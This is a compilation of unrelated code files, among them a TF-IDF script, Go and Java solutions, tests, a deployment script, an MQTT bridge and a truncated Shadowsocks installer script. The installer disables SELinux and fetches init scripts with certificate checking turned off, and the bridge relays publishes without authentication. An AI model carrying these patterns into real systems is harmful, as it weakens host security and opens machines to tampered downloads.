         "የክለቡ ሥራ አስኪያጅ አቶ አቢዮት ብርሃኑ ክለቡ በቀጣይ ከመንግሥት በጀት ተላቆ የራሱ ቋሚ ሀብት እንዲኖረው ሥራዎች በእቅድ እየተሠሩ ስለመሆናቸው ተናግረዋል",
         "ከቴሌቶኑ የሚገኘው ገቢ ለደሞዝና ለእለታዊ ወጭዎች ሳይሆን አካዳሚ መገንባት ጨምሮ ለተያያዙት ትላልቅ ፕሮጀክቶች እንደሚውልም ተጠቅሷል"
         ]

# instantiate CountVectorizer() and learn vocabulary + per-document counts
cv = CountVectorizer()
word_count_vector = cv.fit_transform(docs2)
wcv = word_count_vector.shape
print(wcv)

# fit IDF weights on the raw counts
tfidf_transformer = TfidfTransformer(smooth_idf=True, use_idf=True)
tfidf_transformer.fit(word_count_vector)

# IDF value per vocabulary term, sorted ascending (most common terms first)
# NOTE(review): get_feature_names() was removed in scikit-learn 1.2 in favour
# of get_feature_names_out() — confirm the sklearn version pinned here.
df_idf = pd.DataFrame(tfidf_transformer.idf_, index=cv.get_feature_names(), columns=["idf_weights"])
sa = df_idf.sort_values(by=['idf_weights'])

# count matrix, then tf-idf scores for the same documents
count_vector = cv.transform(docs2)
tf_idf_vector = tfidf_transformer.transform(count_vector)
print(sa)
print("###############")
print(tf_idf_vector)
print("%%%%%%%%%%")

feature_names = cv.get_feature_names()
# tf-idf vector for the first document, as a dense column of scores per term
first_document_vector = tf_idf_vector[0]
df = pd.DataFrame(first_document_vector.T.todense(), index=feature_names, columns=["tfidf"])
# fix: sort_values returns a copy, so the sorted frame was previously
# discarded and the unsorted frame printed; keep and print the sorted one
df = df.sort_values(by=["tfidf"], ascending=False)
print(df)
package parser
// String is the parser's built-in string cell type.
type String struct {
	typeBase
}

// Name reports the type's name, "string".
func (t *String) Name() string {
	return "string"
}

// Layout reports the layout identifier (same as the type name).
func (t *String) Layout() string {
	return "string"
}

// Tag returns the wire tag byte used when marshalling strings.
func (t *String) Tag() byte {
	return tagString
}

// IsBase reports that string is a base (primitive) type.
func (t *String) IsBase() bool {
	return true
}

// BeKey reports that string values may be used as keys.
func (t *String) BeKey() bool {
	return true
}

// BeArr reports that string values may be array elements.
func (t *String) BeArr() bool {
	return true
}

// BeEnum reports that string cannot back an enum.
func (t *String) BeEnum() bool {
	return false
}

// Parse is a no-op for strings: any cell content is acceptable as-is.
func (t *String) Parse(sheet *Sheet, s string) error {
	return nil
}

// Value returns the raw cell text unchanged.
func (t *String) Value(sheet *Sheet, s string) (interface{}, error) {
	return s, nil
}

// Valid returns an empty validation expression — strings need no checks.
func (t *String) Valid() string {
	return ""
}

// Zero returns the type's zero value, the empty string.
func (t *String) Zero() interface{} {
	return ""
}

// Marshal encodes v (must be a string) with the string wire tag.
func (t *String) Marshal(v interface{}) ([]byte, error) {
	return marshalString(v.(string), t.Tag())
}

// Reader returns the type used when reading; strings read as themselves.
func (t *String) Reader() IType {
	return t
}
|
// Per-species format overrides for this mod: places extremeribbit in the
// OU singles tier and the DOU doubles tier.
export const FormatsData: {[k: string]: ModdedSpeciesFormatsData} = {
	extremeribbit: {
		tier: "OU",
		doublesTier: "DOU",
	},
};
#!/usr/bin/env bash
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -xe
# ISO output directory and the port it is served from; every variable below
# honors a pre-set environment value and falls back to the shown default.
export ISO_DIR=${ISO_DIR:-"/srv/iso"}
export SERVE_PORT=${SERVE_PORT:-"8099"}
export AIRSHIPCTL_WS=${AIRSHIPCTL_WS:-$PWD}
export USER_NAME=${USER:-"ubuntu"}
# Proxy settings, normalized from either upper- or lower-case variants.
export USE_PROXY=${USE_PROXY:-"false"}
export HTTPS_PROXY=${HTTPS_PROXY:-${https_proxy}}
export HTTP_PROXY=${HTTP_PROXY:-${http_proxy}}
export NO_PROXY=${NO_PROXY:-${no_proxy}}
export AIRSHIP_CONFIG_ISO_GEN_TARGET_PATH=${ISO_DIR}
export AIRSHIP_CONFIG_ISO_BUILDER_DOCKER_IMAGE=${BUILDER_IMAGE:-"quay.io/airshipit/isogen:latest-ubuntu_focal"}
# Out-of-band management settings used by the generated airship config.
export REMOTE_TYPE=redfish
export REMOTE_INSECURE=true
export REMOTE_PROXY=false
export AIRSHIP_CONFIG_ISO_SERVE_HOST=${HOST:-"localhost"}
export AIRSHIP_CONFIG_ISO_PORT=${SERVE_PORT}
export AIRSHIP_CONFIG_ISO_NAME=${ISO_NAME:-"ubuntu-focal.iso"}
export SYSTEM_ACTION_RETRIES=30
export SYSTEM_REBOOT_DELAY=30
export AIRSHIP_CONFIG_PRIMARY_REPO_BRANCH=${BRANCH:-"master"}
# the git repo url or local file system path to a cloned repo, e.g., /home/stack/airshipctl
export AIRSHIP_CONFIG_PRIMARY_REPO_URL=${REPO:-"https://review.opendev.org/airship/airshipctl"}
export AIRSHIP_SITE_NAME=${AIRSHIP_SITE_NAME:-"manifests/site/test-site"}
export AIRSHIP_CONFIG_MANIFEST_DIRECTORY=${AIRSHIP_CONFIG_MANIFEST_DIRECTORY:-"/tmp/airship"}
# Base64-encode the CA/cert/key material that gets templated into the config.
export AIRSHIP_CONFIG_CA_DATA=$(cat tools/deployment/certificates/airship_config_ca_data| base64 -w0)
export AIRSHIP_CONFIG_EPHEMERAL_IP=${IP_Ephemeral:-"10.23.25.101"}
export AIRSHIP_CONFIG_CLIENT_CERT_DATA=$(cat tools/deployment/certificates/airship_config_client_cert_data| base64 -w0)
export AIRSHIP_CONFIG_CLIENT_KEY_DATA=$(cat tools/deployment/certificates/airship_config_client_key_data| base64 -w0)
# Remove the contents of the .airship folder, preserving the kustomize plugin directory
rm -rf $HOME/.airship/*config*
mkdir -p $HOME/.airship
echo "Generate ~/.airship/config and ~/.airship/kubeconfig"
# Substitute all exported variables above into the config templates.
envsubst <"${AIRSHIPCTL_WS}/tools/deployment/templates/airshipconfig_template" > ~/.airship/config
envsubst <"${AIRSHIPCTL_WS}/tools/deployment/templates/kubeconfig_template" > ~/.airship/kubeconfig
# Sanity-check the generated config contains the ephemeral cluster entry.
if ! airshipctl config get-cluster | grep -q 'dummycluster_ephemeral' ; then
  echo "Unable to verify the ephemeral cluster details. Please verify the ephemeral cluster configuration."
else
  echo "Verify airshipctl configuration"
  airshipctl config get-cluster
fi
|
//
// Copyright (C) 2018 <NAME>
//
// @@ All Rights Reserved @@
// This file is part of the RDKit.
// The contents are covered by the terms of the BSD license
// which is included in the file license.txt, found at the root
// of the RDKit source tree.
//
#include <RDGeneral/export.h>
#ifndef __RD_TAUTOMER_CATALOG_UTILS_H__
#define __RD_TAUTOMER_CATALOG_UTILS_H__
#include <GraphMol/RDKitBase.h>
#include "TautomerCatalogParams.h"
#include <GraphMol/Substruct/SubstructMatch.h>
#include <GraphMol/ChemReactions/Reaction.h>
#include <GraphMol/Bond.h>
#include <iostream>
namespace RDKit {
class ROMol;
namespace MolStandardize {
class TautomerCatalogParams;
// typedef enum {
// SINGLE,
// DOUBLE,
// TRIPLE,
// AROMATIC,
//} BondType;
// typedef std::vector<ROMol*, std::string, std::string> tautomerTransform;
// Holds one tautomer transform: an owned query molecule plus the bond
// types and charges the transform applies. Copies deep-copy the molecule
// so every instance owns its own ROMol.
class RDKIT_MOLSTANDARDIZE_EXPORT TautomerTransform {
 public:
  ROMol* Mol;  // owned; released in the destructor
  std::vector<Bond::BondType> BondTypes;
  std::vector<int> Charges;

  TautomerTransform(ROMol* mol, const std::vector<Bond::BondType>& bondtypes,
                    const std::vector<int>& charges)
      : Mol(mol), BondTypes(bondtypes), Charges(charges) {}

  TautomerTransform(const TautomerTransform& other)
      : BondTypes(other.BondTypes), Charges(other.Charges) {
    Mol = new ROMol(*other.Mol);
  }

  TautomerTransform& operator=(const TautomerTransform& other) {
    if (this != &other) {
      // Fix: the previously owned molecule was leaked here — release it
      // before taking a deep copy of the other instance's molecule.
      delete Mol;
      Mol = new ROMol(*other.Mol);
      BondTypes = other.BondTypes;
      Charges = other.Charges;
    }
    return *this;
  }

  ~TautomerTransform() { delete Mol; }
};
//! Convert the bond-type field of a transform definition into BondType values.
RDKIT_MOLSTANDARDIZE_EXPORT std::vector<Bond::BondType> stringToBondType(
    std::string bond_str);
//! Convert the charge field of a transform definition into integer charges.
RDKIT_MOLSTANDARDIZE_EXPORT std::vector<int> stringToCharge(
    std::string charge_str);
//! Read tautomer transforms from the named file.
RDKIT_MOLSTANDARDIZE_EXPORT std::vector<TautomerTransform> readTautomers(
    std::string fileName);
//! Read tautomer transforms from a stream; nToRead defaults to -1
//! (presumably "no limit" — confirm against the implementation).
RDKIT_MOLSTANDARDIZE_EXPORT std::vector<TautomerTransform> readTautomers(
    std::istream& inStream, int nToRead = -1);
} // namespace MolStandardize
} // namespace RDKit
#endif
|
<filename>__tests__/shared/actions/index.js
/**
* Actions testing.
*/
import actions from 'actions';
// Snapshot the aggregated actions object so accidental additions or
// removals of exported actions show up as a snapshot diff.
test('Exports expected actions',
  () => expect(actions).toMatchSnapshot());
|
package problems
import "math"
type (
	// stockPrices is an array of stock prices at time i
	stockPrices []int
)

// maxProfit returns the best profit obtainable from a single buy-then-sell
// over the price series, or 0 when no profitable trade exists (including
// series with fewer than two prices).
//
// dp[i] is the best profit considering days 0..i; min tracks the lowest
// price seen strictly before day i.
func (in stockPrices) maxProfit() int {
	n := len(in)
	if n < 2 {
		return 0
	}
	dp := make([]int, n)
	dp[0] = 0
	min := math.MaxInt32
	for i := 1; i < n; i++ {
		if in[i-1] < min {
			min = in[i-1]
		}
		dp[i] = dp[i-1]
		if in[i]-min > dp[i] {
			dp[i] = in[i] - min
		}
	}
	// Fix: the answer is dp[n-1]; the previous `return dp[n]` indexed one
	// past the end of dp and panicked for every input with n >= 2.
	return dp[n-1]
}
|
def loss(cls_scores, bbox_preds, gt_bboxes, gt_labels, img_metas, gt_bboxes_ignore):
    """Compute classification and bounding-box regression losses.

    Implements the behavior the original stub described in comments
    (cross-entropy for classification, smooth L1 for box regression);
    the stub previously referenced undefined names and raised NameError.

    Args:
        cls_scores: ``(num_samples, num_classes)`` raw classification logits.
        bbox_preds: ``(num_samples, 4)`` predicted box values.
        gt_bboxes: ``(num_samples, 4)`` ground-truth boxes aligned with
            ``bbox_preds`` row-for-row.
        gt_labels: ``(num_samples,)`` integer class targets.
        img_metas: per-image metadata; unused here, kept for interface
            compatibility with detector heads that require it.
        gt_bboxes_ignore: ignored boxes; unused here (no ignore handling).

    Returns:
        dict: ``{'loss_cls': <cross-entropy>, 'loss_bbox': <smooth L1>}``.
    """
    import torch.nn.functional as F

    # Classification loss: standard cross-entropy over the raw logits.
    cls_loss = F.cross_entropy(cls_scores, gt_labels)
    # Box regression loss: smooth L1 between predictions and targets.
    box_loss = F.smooth_l1_loss(bbox_preds, gt_bboxes)
    # Create a dictionary to store the losses
    losses = {
        'loss_cls': cls_loss,
        'loss_bbox': box_loss
    }
    return losses
from uvicore.contracts import Binding as BindingInterface
class Binding(BindingInterface):
    """Concrete service-container binding.

    Adds no behavior of its own; everything is inherited from the
    uvicore ``Binding`` contract.
    """
    pass
|
<filename>services/pusher.js
var sys = require('util');
var net = require('net');
var mqtt = require('mqtt');
var io = require('socket.io').listen(4000);
var client = mqtt.connect('mqtt://172.16.31.10');
// Bridge Socket.IO clients to the MQTT broker: browser 'subscribe' and
// 'publish' events are forwarded to MQTT, and every MQTT message is
// broadcast back to all connected sockets as an 'mqtt' event.
io.sockets.on('connection',function (socket) {
    socket.on('subscribe',function (data) {
        console.log('Subscribing to: '+data.topic);
        client.subscribe(data.topic);
    });
    socket.on('publish',function(data){
        console.log('Publishing: '+data.payload);
        client.publish(data.topic,data.payload);
    });
});
// Fan incoming MQTT messages out to every connected Socket.IO client.
client.on('message',function (topic,payload) {
    console.log(String(topic)+': '+String(payload));
    io.sockets.emit('mqtt',{
        'topic' : String(topic),
        'payload' : String(payload)
    });
});
<reponame>huangbin082/Bin<filename>Algorithm/src/main/java/com/leetcode/Solution_862.java
package com.leetcode;
import java.util.LinkedList;
/**
 * LeetCode 862: length of the shortest non-empty subarray with sum >= k,
 * or -1 if none exists. Uses a monotonically increasing deque of prefix-sum
 * indices: indices whose prefix sum is dominated can never start a shorter
 * answer, and indices that already satisfy the target can be retired.
 */
public class Solution_862 {
    public int shortestSubarray(int[] nums, int k) {
        // prefix[j] = sum of nums[0..j-1]; prefix[0] = 0.
        int[] prefix = new int[nums.length + 1];
        for (int i = 0; i < nums.length; i++) {
            prefix[i + 1] = prefix[i] + nums[i];
        }
        int best = Integer.MAX_VALUE;
        LinkedList<Integer> candidates = new LinkedList<>();
        for (int j = 0; j < prefix.length; j++) {
            // Drop candidates whose prefix sum is >= prefix[j]: j is a
            // strictly better (later, lower-or-equal) starting point.
            while (!candidates.isEmpty() && prefix[candidates.peekLast()] > prefix[j]) {
                candidates.pollLast();
            }
            // Retire every start index that already reaches the target;
            // later end indices could only give longer subarrays.
            while (!candidates.isEmpty() && prefix[j] - prefix[candidates.peekFirst()] >= k) {
                best = Math.min(best, j - candidates.pollFirst());
            }
            candidates.offerLast(j);
        }
        return best == Integer.MAX_VALUE ? -1 : best;
    }
}
|
#!/bin/bash
# Remove the log files that are older than 30 days
# NOTE(review): the shell expands /var/log/* before find runs, so dot-entries
# directly under /var/log are skipped and a very large directory could
# overflow the argument list; `find /var/log -type f -mtime +30 -delete`
# would avoid both — confirm the glob is intentional before changing.
find /var/log/* -type f -mtime +30 -delete
|
package zio
import (
"fmt"
"io"
"net/http"
"strings"
"testing"
)
// TestDumpReader verifies that DumpReader duplicates a reader: both
// returned readers must yield the complete original contents, including
// multi-byte UTF-8 text and the empty http.NoBody reader.
func TestDumpReader(t *testing.T) {
	cases := []struct {
		in   io.ReadCloser
		want string
	}{
		{
			io.NopCloser(strings.NewReader("Hello")),
			"Hello",
		},
		{
			// Arabic text: exercises multi-byte UTF-8 round-tripping.
			io.NopCloser(strings.NewReader("لوحة المفاتيح العربية")),
			"لوحة المفاتيح العربية",
		},
		{
			http.NoBody,
			"",
		},
	}
	for i, tc := range cases {
		t.Run(fmt.Sprintf("%v", i), func(t *testing.T) {
			outR1, outR2, err := DumpReader(tc.in)
			if err != nil {
				t.Fatal(err)
			}
			// Both halves of the duplicated reader must match the input.
			out1 := mustRead(t, outR1)
			out2 := mustRead(t, outR2)
			if out1 != tc.want {
				t.Errorf("out1 wrong\nout: %#v\nwant: %#v\n", out1, tc.want)
			}
			if out2 != tc.want {
				t.Errorf("out2 wrong\nout: %#v\nwant: %#v\n", out2, tc.want)
			}
		})
	}
}
func mustRead(t *testing.T, r io.Reader) string {
out, err := io.ReadAll(r)
if err != nil {
t.Fatal(err)
}
return string(out)
}
// TestExists checks Exists against a range of path kinds.
// NOTE(review): the fixtures assume a Unix host with /dev/null,
// /proc/1/environ and /etc/localtime present — this test is
// environment-dependent and will fail on minimal containers or
// non-Linux systems; confirm the intended target platforms.
func TestExists(t *testing.T) {
	tests := []struct {
		in   string
		want bool
	}{
		{".", true},               // Dir
		{"zio.go", true},          // File
		{"/dev/null", true},       // Device
		{"/proc/1/environ", true}, // Not readable
		{"/etc/localtime", true},  // Symlink
		{"/nonexistent-path", false},
		{"/nonexistent/path", false},
	}
	for i, tt := range tests {
		t.Run(fmt.Sprintf("%v", i), func(t *testing.T) {
			out := Exists(tt.in)
			if out != tt.want {
				t.Errorf("\nout: %#v\nwant: %#v\n", out, tt.want)
			}
		})
	}
}
|
#!/usr/bin/env bash
# Pin a fixed PATH so the installer finds system binaries regardless of the
# invoking user's environment.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
#
# Auto install Shadowsocks Server (all version)
#
# Copyright (C) 2016-2019 Teddysun <i@teddysun.com>
#
# System Required: CentOS 6+, Debian7+, Ubuntu12+
#
# Reference URL:
# https://github.com/shadowsocks/shadowsocks
# https://github.com/shadowsocks/shadowsocks-go
# https://github.com/shadowsocks/shadowsocks-libev
# https://github.com/shadowsocks/shadowsocks-windows
# https://github.com/shadowsocksr-rm/shadowsocksr
# https://github.com/shadowsocksrr/shadowsocksr
# https://github.com/shadowsocksrr/shadowsocksr-csharp
#
# Thanks:
# @clowwindy <https://twitter.com/clowwindy>
# @breakwa11 <https://twitter.com/breakwa11>
# @cyfdecyf <https://twitter.com/cyfdecyf>
# @madeye <https://github.com/madeye>
# @linusyang <https://github.com/linusyang>
# @Akkariiin <https://github.com/Akkariiin>
#
# Intro: https://teddysun.com/486.html
# ANSI color escape sequences used by the status messages below.
red='\033[0;31m'
green='\033[0;32m'
yellow='\033[0;33m'
plain='\033[0m'
# The installer writes to /etc, /usr and init scripts — refuse to run unprivileged.
[[ $EUID -ne 0 ]] && echo -e "[${red}Error${plain}] This script must be run as root!" && exit 1
# Working directory where archives are downloaded and unpacked.
cur_dir=$( pwd )
# Menu entries; the user's 1-based pick is stored in ${selected}.
software=(Shadowsocks-Python ShadowsocksR Shadowsocks-Go Shadowsocks-libev)
# Pinned archive names/URLs and per-flavor init-script + config-file paths.
libsodium_file='libsodium-1.0.18'
libsodium_url='https://github.com/jedisct1/libsodium/releases/download/1.0.18-RELEASE/libsodium-1.0.18.tar.gz'
mbedtls_file='mbedtls-2.16.6'
mbedtls_url='https://tls.mbed.org/download/'"$mbedtls_file"'-apache.tgz'
shadowsocks_python_file='shadowsocks-master'
shadowsocks_python_url='https://github.com/shadowsocks/shadowsocks/archive/master.zip'
shadowsocks_python_init='/etc/init.d/shadowsocks-python'
shadowsocks_python_config='/etc/shadowsocks-python/config.json'
shadowsocks_python_centos='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks'
shadowsocks_python_debian='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-debian'
shadowsocks_r_file='shadowsocksr-3.2.2'
shadowsocks_r_url='https://github.com/shadowsocksrr/shadowsocksr/archive/3.2.2.tar.gz'
shadowsocks_r_init='/etc/init.d/shadowsocks-r'
shadowsocks_r_config='/etc/shadowsocks-r/config.json'
shadowsocks_r_centos='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocksR'
shadowsocks_r_debian='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocksR-debian'
shadowsocks_go_file_64='shadowsocks-server-linux64-1.2.2'
shadowsocks_go_url_64='https://dl.lamp.sh/shadowsocks/shadowsocks-server-linux64-1.2.2.gz'
shadowsocks_go_file_32='shadowsocks-server-linux32-1.2.2'
shadowsocks_go_url_32='https://dl.lamp.sh/shadowsocks/shadowsocks-server-linux32-1.2.2.gz'
shadowsocks_go_init='/etc/init.d/shadowsocks-go'
shadowsocks_go_config='/etc/shadowsocks-go/config.json'
shadowsocks_go_centos='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-go'
shadowsocks_go_debian='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-go-debian'
shadowsocks_libev_init='/etc/init.d/shadowsocks-libev'
shadowsocks_libev_config='/etc/shadowsocks-libev/config.json'
shadowsocks_libev_centos='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-libev'
shadowsocks_libev_debian='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-libev-debian'
# Stream Ciphers
# Cipher menus: one list per flavor (python/libev share common_ciphers).
common_ciphers=(
aes-256-gcm
aes-192-gcm
aes-128-gcm
aes-256-ctr
aes-192-ctr
aes-128-ctr
aes-256-cfb
aes-192-cfb
aes-128-cfb
camellia-128-cfb
camellia-192-cfb
camellia-256-cfb
xchacha20-ietf-poly1305
chacha20-ietf-poly1305
chacha20-ietf
chacha20
salsa20
rc4-md5
)
go_ciphers=(
aes-256-cfb
aes-192-cfb
aes-128-cfb
aes-256-ctr
aes-192-ctr
aes-128-ctr
chacha20-ietf
chacha20
salsa20
rc4-md5
)
r_ciphers=(
none
aes-256-cfb
aes-192-cfb
aes-128-cfb
aes-256-cfb8
aes-192-cfb8
aes-128-cfb8
aes-256-ctr
aes-192-ctr
aes-128-ctr
chacha20-ietf
chacha20
salsa20
xchacha20
xsalsa20
rc4-md5
)
# Reference URL:
# https://github.com/shadowsocksr-rm/shadowsocks-rss/blob/master/ssr.md
# https://github.com/shadowsocksrr/shadowsocksr/commit/a3cf0254508992b7126ab1151df0c2f10bf82680
# Protocol
protocols=(
origin
verify_deflate
auth_sha1_v4
auth_sha1_v4_compatible
auth_aes128_md5
auth_aes128_sha1
auth_chain_a
auth_chain_b
auth_chain_c
auth_chain_d
auth_chain_e
auth_chain_f
)
# obfs
obfs=(
plain
http_simple
http_simple_compatible
http_post
http_post_compatible
tls1.2_ticket_auth
tls1.2_ticket_auth_compatible
tls1.2_ticket_fastauth
tls1.2_ticket_fastauth_compatible
)
# libev obfuscating
obfs_libev=(http tls)
# initialization parameter
libev_obfs=''
# Permanently switch SELinux from enforcing to disabled in its config and
# turn it off for the current boot, so the init scripts installed later are
# not blocked by policy.
disable_selinux(){
    # -q: we only need grep's exit status, not the matched line on stdout
    if [ -s /etc/selinux/config ] && grep -q 'SELINUX=enforcing' /etc/selinux/config; then
        sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config
        setenforce 0
    fi
}
# check_sys TYPE VALUE — probe the host OS.
#   TYPE 'sysRelease':     succeed when the distro matches VALUE (centos/debian/ubuntu)
#   TYPE 'packageManager': succeed when the package manager matches VALUE (yum/apt)
# Detection order matters: /etc/redhat-release, then /etc/issue, then
# /proc/version; the first match wins.
check_sys(){
local checkType=$1
local value=$2
local release=''
local systemPackage=''
if [[ -f /etc/redhat-release ]]; then
release='centos'
systemPackage='yum'
elif grep -Eqi 'debian|raspbian' /etc/issue; then
release='debian'
systemPackage='apt'
elif grep -Eqi 'ubuntu' /etc/issue; then
release='ubuntu'
systemPackage='apt'
elif grep -Eqi 'centos|red hat|redhat' /etc/issue; then
release='centos'
systemPackage='yum'
elif grep -Eqi 'debian|raspbian' /proc/version; then
release='debian'
systemPackage='apt'
elif grep -Eqi 'ubuntu' /proc/version; then
release='ubuntu'
systemPackage='apt'
elif grep -Eqi 'centos|red hat|redhat' /proc/version; then
release='centos'
systemPackage='yum'
fi
if [[ "${checkType}" == 'sysRelease' ]]; then
if [ "${value}" == "${release}" ]; then
return 0
else
return 1
fi
elif [[ "${checkType}" == 'packageManager' ]]; then
if [ "${value}" == "${systemPackage}" ]; then
return 0
else
return 1
fi
fi
}
# version_ge A B — succeed when version A >= version B (version-aware compare).
version_ge(){
    local highest
    highest=$(printf '%s\n' "$@" | sort -rV | head -n 1)
    [ "${highest}" == "$1" ]
}
# version_gt A B — succeed when version A is strictly greater than B.
version_gt(){
    local lowest
    lowest=$(printf '%s\n' "$@" | sort -V | head -n 1)
    [ "${lowest}" != "$1" ]
}
# Succeed when the running kernel's base version is strictly newer than 3.7.0.
check_kernel_version(){
    local base_ver
    # strip the distro suffix: e.g. "3.10.0-1160.el7" -> "3.10.0"
    base_ver=$(uname -r | cut -d- -f1)
    # propagate version_gt's exit status directly
    version_gt "${base_ver}" 3.7.0
}
# Succeed when kernel headers matching the running kernel are installed,
# checking via rpm on yum systems and dpkg on apt systems.
check_kernel_headers(){
    local running
    running=$(uname -r)
    if check_sys packageManager yum; then
        if rpm -qa | grep -q headers-"${running}"; then
            return 0
        fi
        return 1
    fi
    if check_sys packageManager apt; then
        if dpkg -s linux-headers-"${running}" > /dev/null 2>&1; then
            return 0
        fi
        return 1
    fi
    return 1
}
# Print the numeric version string(s) found in the OS release file,
# preferring /etc/redhat-release when it is non-empty.
getversion(){
    local src=/etc/issue
    [[ -s /etc/redhat-release ]] && src=/etc/redhat-release
    grep -oE '[0-9.]+' "${src}"
}
# centosversion N — succeed only on CentOS whose major version equals N.
centosversion(){
    # non-CentOS hosts never match
    check_sys sysRelease centos || return 1
    local wanted=$1
    local full_ver
    full_ver="$(getversion)"
    # compare only the major component (text before the first dot)
    [ "${full_ver%%.*}" == "${wanted}" ]
}
# Ensure autoconf is installed (best-effort install via yum/apt if missing),
# then succeed when its version is >= 2.67 — the threshold the simple-obfs
# build path (install_prepare_libev_obfs) depends on.
autoconf_version(){
if [ ! "$(command -v autoconf)" ]; then
echo -e "[${green}Info${plain}] Starting install package autoconf"
if check_sys packageManager yum; then
yum install -y autoconf > /dev/null 2>&1 || echo -e "[${red}Error:${plain}] Failed to install autoconf"
elif check_sys packageManager apt; then
apt-get -y update > /dev/null 2>&1
apt-get -y install autoconf > /dev/null 2>&1 || echo -e "[${red}Error:${plain}] Failed to install autoconf"
fi
fi
local autoconf_ver
# pull the numeric version out of `autoconf --version`'s banner line
autoconf_ver=$(autoconf --version | grep autoconf | grep -oE '[0-9.]+')
if version_ge "${autoconf_ver}" 2.67; then
return 0
else
return 1
fi
}
# Print the server's public IPv4 address: first non-private address reported
# by `ip addr`, falling back to two external lookup services.
get_ip(){
    local IP
    # grep -E / grep -vE replace the deprecated egrep; exclude RFC1918,
    # loopback, broadcast and other non-public ranges
    IP=$( ip addr | grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | grep -vE '^192\.168|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-2]\.|^10\.|^127\.|^255\.|^0\.' | head -n 1 )
    [ -z "${IP}" ] && IP=$( wget -qO- -t1 -T2 ipv4.icanhazip.com )
    [ -z "${IP}" ] && IP=$( wget -qO- -t1 -T2 ipinfo.io/ip )
    echo "${IP}"
}
# Succeed when the host has working outbound IPv6 (an external lookup
# service returns an address).
get_ipv6(){
    local addr
    addr=$(wget -qO- -t1 -T2 ipv6.icanhazip.com)
    if [ -z "${addr}" ]; then
        return 1
    fi
    return 0
}
# Resolve the latest shadowsocks-libev release tag from the GitHub API into
# the global ${libev_ver}; abort the script when the lookup fails.
get_libev_ver(){
libev_ver=$(wget --no-check-certificate -qO- https://api.github.com/repos/shadowsocks/shadowsocks-libev/releases/latest | grep 'tag_name' | cut -d\" -f4)
[ -z "${libev_ver}" ] && echo -e "[${red}Error${plain}] Get shadowsocks-libev latest version failed" && exit 1
}
# Print a human-readable OS name/version from the first release file that
# exists, trying redhat-release, os-release, then lsb-release.
get_opsy(){
[ -f /etc/redhat-release ] && awk '{print ($1,$3~/^[0-9]/?$3:$4)}' /etc/redhat-release && return
[ -f /etc/os-release ] && awk -F'[= "]' '/PRETTY_NAME/{print $3,$4,$5}' /etc/os-release && return
[ -f /etc/lsb-release ] && awk -F'[="]+' '/DESCRIPTION/{print $2}' /etc/lsb-release && return
}
# Succeed when the userland is 64-bit. On Linux getconf WORD_BIT reports 32
# even on 64-bit systems, so LONG_BIT=64 is the discriminator.
is_64bit(){
    # quote the substitutions so an empty getconf result cannot turn the
    # test into a syntax error ([ = '32' ])
    if [ "$(getconf WORD_BIT)" = '32' ] && [ "$(getconf LONG_BIT)" = '64' ] ; then
        return 0
    else
        return 1
    fi
}
# debianversion N — succeed only on Debian whose version digits equal N.
debianversion(){
    # non-Debian hosts never match
    check_sys sysRelease debian || return 1
    local expected
    expected=${1}
    local opsy_digits
    # keep only the digits of the pretty OS string, e.g. "Debian GNU/Linux 9" -> "9"
    opsy_digits=$( get_opsy | sed 's/[^0-9]//g')
    [ "${opsy_digits}" == "${expected}" ]
}
# download LOCAL_FILE URL — fetch URL into LOCAL_FILE unless it already
# exists; abort the whole installer when the download fails.
download(){
    local filename
    filename=$(basename "$1")
    if [ -f "${1}" ]; then
        # fix: the messages invoked a nonexistent command `unknown` via
        # $(unknown) while the computed ${filename} was never used
        echo "${filename} [found]"
    else
        echo "${filename} not found, download now..."
        wget --no-check-certificate -c -t3 -T60 -O "${1}" "${2}"
        if [ $? -ne 0 ]; then
            echo -e "[${red}Error${plain}] Download ${filename} failed."
            exit 1
        fi
    fi
}
# Download the archive and matching init script for the flavor chosen in
# ${selected} (1=python, 2=R, 3=go, 4=libev); the init script variant is
# picked per package manager (centos vs debian style).
download_files(){
cd "${cur_dir}" || exit
if [ "${selected}" == '1' ]; then
download "${shadowsocks_python_file}.zip" "${shadowsocks_python_url}"
if check_sys packageManager yum; then
download "${shadowsocks_python_init}" "${shadowsocks_python_centos}"
elif check_sys packageManager apt; then
download "${shadowsocks_python_init}" "${shadowsocks_python_debian}"
fi
elif [ "${selected}" == '2' ]; then
download "${shadowsocks_r_file}.tar.gz" "${shadowsocks_r_url}"
if check_sys packageManager yum; then
download "${shadowsocks_r_init}" "${shadowsocks_r_centos}"
elif check_sys packageManager apt; then
download "${shadowsocks_r_init}" "${shadowsocks_r_debian}"
fi
elif [ "${selected}" == '3' ]; then
# Go binary is prebuilt; choose the 64- or 32-bit build
if is_64bit; then
download "${shadowsocks_go_file_64}.gz" "${shadowsocks_go_url_64}"
else
download "${shadowsocks_go_file_32}.gz" "${shadowsocks_go_url_32}"
fi
if check_sys packageManager yum; then
download "${shadowsocks_go_init}" "${shadowsocks_go_centos}"
elif check_sys packageManager apt; then
download "${shadowsocks_go_init}" "${shadowsocks_go_debian}"
fi
elif [ "${selected}" == '4' ]; then
# libev archive name depends on the latest release tag (strip leading 'v')
get_libev_ver
shadowsocks_libev_file="shadowsocks-libev-$(echo "${libev_ver}" | sed -e 's/^[a-zA-Z]//g')"
shadowsocks_libev_url="https://github.com/shadowsocks/shadowsocks-libev/releases/download/${libev_ver}/${shadowsocks_libev_file}.tar.gz"
